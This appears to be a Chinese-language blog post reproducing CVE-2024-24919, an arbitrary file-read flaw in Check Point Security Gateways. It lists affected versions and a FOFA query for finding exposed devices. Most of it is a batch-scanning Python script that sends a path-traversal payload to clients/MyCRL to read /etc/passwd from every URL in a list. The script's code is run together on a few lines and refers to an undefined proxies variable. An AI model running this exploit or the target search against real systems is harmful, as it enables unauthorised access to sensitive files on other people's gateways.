Check Point 安全网关任意文件读取漏洞复现(CVE-2024-24919)

1.漏洞描述

Check Point Security Gateways 是 Check Point Sofware 提供的一系列网络安全Q解决方案。这些解决方案包括下一代防火墙(NGFW)、数据中心安全网关和 A1驱动的量子网关，旨在为企业提供针对复杂网络威胁的先进防护。它们通过集成的威胁防护、统的安全管理和策略控制，确保网络、云、移动和端点的安全。

Check Point Security Gateways 任意文件读取漏洞(CVE-2024-24919)存在在野利用，远程攻击者可以通过构造恶意请求读取服务器上的任意文件，造成敏感信息的泄漏。目前，此漏洞已检测到在野利用。鉴于该漏洞影响范围较大，建议客户尽快做好自查及防护。

2.影响范围

Check Point Security Gateways R77.20 (EOL)

Check Point Security Gateways R77.30 (EOL)

Check Point Security Gateways R80.10 (EOL)

Check Point Security Gateways R80.20 (EOL)

Check Point Security Gateways R80.20.x

Check Point Security Gateways R80.20SP (EOL)

Check Point Security Gateways R80.30 (EOL)

Check Point Security Gateways R80.30SP (EOL)

Check Point Security Gateways R80.40 (EOL)

Check Point Security Gateways R81

Check Point Security Gateways R81.10

Check Point Security Gateways R81.10.x

Check Point Security Gateways R81.20

fofa语法

app="Check_Point-SSL-Network-Extender"

3.漏洞复现

在这里插入图片描述

4.python批量验证

import requests
from urllib.parse import urljoin
import urllib3
from requests.exceptions import SSLErrorurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)def send_post_request(base_url, file):full_url = urljoin(base_url, 'clients/MyCRL')full_payload = "aCSHELL/../../../../../../.." + fileheaders = {'Content-Length': str(len(full_payload))}try:response = requests.post(full_url, data=full_payload, headers=headers, proxies=proxies, verify=False)if response.status_code == 200 and 'root' in response.content.decode():print(f'存在漏洞，URL为: {base_url}')except SSLError as e:print(f"SSL error accessing {base_url}: {e}")except requests.exceptions.RequestException as e:print(f"Error accessing {base_url}: {e}")def read_urls_from_file(file_path):try:with open(file_path, 'r') as file:urls = file.readlines()# Strip whitespace characters like `\n` at the end of each lineurls = [url.strip() for url in urls]return urlsexcept Exception as e:print(f"Error reading URLs from file: {e}")return []if __name__ == "__main__":input_file = 'urls.txt'target_file = '/etc/passwd'urls = read_urls_from_file(input_file)for url in urls:send_post_request(url, target_file)

在这里插入图片描述